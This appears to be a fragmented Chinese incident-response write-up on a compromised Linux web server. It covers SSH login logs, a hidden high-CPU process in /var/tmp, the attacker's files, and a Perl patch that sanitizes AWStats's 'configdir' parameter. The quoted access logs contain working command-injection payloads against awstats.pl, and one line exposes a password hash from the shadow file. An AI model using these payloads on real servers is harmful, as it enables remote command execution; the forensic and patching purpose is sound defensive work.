1
|
more
/var/log/secure
|
grep
Accepted
|
1
|
Oct 3 03:10:25 webserver sshd[20701]: Accepted password
for
mail from 62.17.163.186 port 53349 ssh2
|
1
|
mail:$1$kCEd3yD6$W1evaY5BMPQIqfTwTVJiX1:15400:0:99999:7:::
|
1
|
nobody 22765 1 6 Sep29 ? 4-00:11:58 .t
|
1
2
|
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
22765 nobody 15 0 1740m 1362m 1228 S 98.3 91.5 2892:19 .t
|
1
2
|
[root@webserver ~]
# /mnt/bin/ls -al /proc/22765/exe
lrwxrwxrwx 1 root root 0 Sep 29 22:09
/proc/22765/exe
->
/var/tmp/
…
/apa/t
|
1
2
3
4
5
6
7
8
9
|
[root@webserver ...]
#/mnt/bin/ls -al
drwxr-xr-x 2 nobody nobody 4096 Sep 29 22:09 apa
-rw-r--r-- 1 nobody nobody 0 Sep 29 22:09 apa.tgz
drwxr-xr-x 2 nobody nobody 4096 Sep 29 22:09 caca
drwxr-xr-x 2 nobody nobody 4096 Sep 29 22:09 haha
-rw-r--r-- 1 nobody nobody 0Sep 29 22:10 kk.
tar
.gz
-rwxr-xr-x 1 nobody nobody 0 Sep 29 22:10 login
-rw-r--r-- 1 nobody nobody 0 Sep 29 22:10 login.tgz
-rwxr-xr-x 1 nobody nobody 0 Sep 29 22:10 z
|
1
|
.
/z
62.17.163.186
|
1
2
|
62.17.163.186 - - [29
/Sep/2013
:22:17:06 +0800]
"GET http://www.xxx.com/cgi-bin/awstats.pl?configdir=|echo;echo;ps+-aux%00 HTTP/1.0"
200 12333
"-"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1) Gecko/20121010 Firefox/2.0"
62.17.163.186 - - [29
/Sep/213
:22:17:35 +0800]
"GET http://www.xxx.com/cgi-bin/awstats.pl?configdir=|echo;echo;cd+/var/tmp/.../haha;ls+-a%00 HTTP/1.0"
200 1626
"-"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1) Gecko/20121010 Firefox/2.0"
|
1
2
3
4
5
6
7
8
9
10
|
if
($QueryString =~
/configdir
=([^&]+)
/i
)
{
$DirConfig=&DecodeEncodedString(
"$1"
);
}
修改为如下即可:
if
($QueryString =~
/configdir
=([^&]+)
/i
)
{
$DirConfig=&DecodeEncodedString(
"$1"
);
$DirConfig=~
tr
/a-z0-9_
\-\/\.
/a-z0-9_
\-\/\.
/cd
;
}
|